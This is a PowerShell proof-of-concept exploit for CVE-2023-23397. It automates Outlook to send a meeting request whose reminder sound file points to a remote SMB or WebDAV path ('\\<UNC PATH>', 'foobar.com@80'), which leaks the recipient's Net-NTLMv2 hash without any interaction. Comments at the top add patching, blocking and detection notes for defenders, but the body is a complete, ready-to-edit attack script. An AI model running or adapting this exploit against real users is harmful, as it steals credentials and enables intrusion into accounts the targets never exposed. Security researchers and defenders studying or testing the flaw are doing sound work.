CVE-2023-23397.ps1
# PoC script for CVE-2023-23397, ported to PowerShell
# Credits go to Dominic Chell at MDSec
# See: https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/
#
# Purpose: drives the local Outlook client over COM to build a meeting request
# whose reminder sound file is a UNC path, then saves and sends it. On an
# unpatched Outlook for Windows client, the reminder firing makes Outlook
# resolve that path and authenticate to the remote host, which exposes the
# recipient's Net-NTLMv2 hash without any interaction from the recipient.
#
# Defender notes:
#  - Fixed by Microsoft's March 2023 Outlook security updates; patching the
#    client is the primary mitigation.
#  - Interim hardening from Microsoft's advisory: block outbound TCP 445 at
#    the perimeter, and add high-value accounts to the Protected Users group
#    so NTLM cannot be used for them.
#  - Detection: workstation-originated SMB (TCP 445) or WebDAV traffic to
#    external hosts, and mailbox items whose reminder sound file property
#    (PidLidReminderFileParameter) holds a UNC path. Microsoft published an
#    Exchange audit script that searches mailboxes for such items.

# Create the Outlook automation object via COM (requires Outlook on this host).
$ol = New-Object -ComObject Outlook.Application
# NOTE(review): the item type is passed as the enum member's name in a string;
# presumably the COM binder maps it to the OlItemType value - confirm.
$meeting = $ol.CreateItem('olAppointmentItem')
$meeting.Subject = 'Time for a malicious meeting'
$meeting.Body = 'Simple CVE-2023-23397 test script'
$meeting.Location = 'Virtual'
$meeting.ReminderSet = $True
# 1 is olImportanceNormal in Outlook's OlImportance enum.
$meeting.Importance = 1
# olMeeting turns the appointment into a meeting request that can be sent to
# recipients. NOTE(review): this type literal needs the Outlook interop
# assembly to be loadable in the session - confirm on the test host.
$meeting.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
$meeting.Recipients.Add('user@domain.com') # Set 'to' email address here
# The meeting starts 16 minutes from now and the reminder is due 15 minutes
# before the start, so the reminder (and the sound-file lookup that comes with
# it) should fire about 1 minute after the script runs.
$meeting.ReminderMinutesBeforeStart = 15
$meeting.Start = [datetime]::Now.AddMinutes(16)
$meeting.Duration = 30
# Outlook only honours ReminderSoundFile when both ReminderPlaySound and
# ReminderOverrideDefault are True, so both are set before the path is assigned.
$meeting.ReminderPlaySound = $True
$meeting.ReminderOverrideDefault = $True
# This is the property that triggers the vulnerability:
# Outlook will attempt to load the sound file from a remote
# server (if one is specified in the UNC path). This value is what defenders
# should look for when auditing stored calendar, mail and task items.
$meeting.ReminderSoundFile = "\\<UNC PATH>" # Change to your SMB server
# This can also be a WebDAV request (see https://www.n00py.io/2019/06/understanding-unc-paths-smb-and-webdav/) either via HTTP or HTTPS:
# $meeting.ReminderSoundFile = "\\foobar.com@80\soundfile.wav"
# $meeting.ReminderSoundFile = "\\foobar.com@SSL@443\soundfile.wav"
# Persist the item in the sender's calendar, then send the meeting request to
# the recipient list.
$meeting.Save()
$meeting.Send()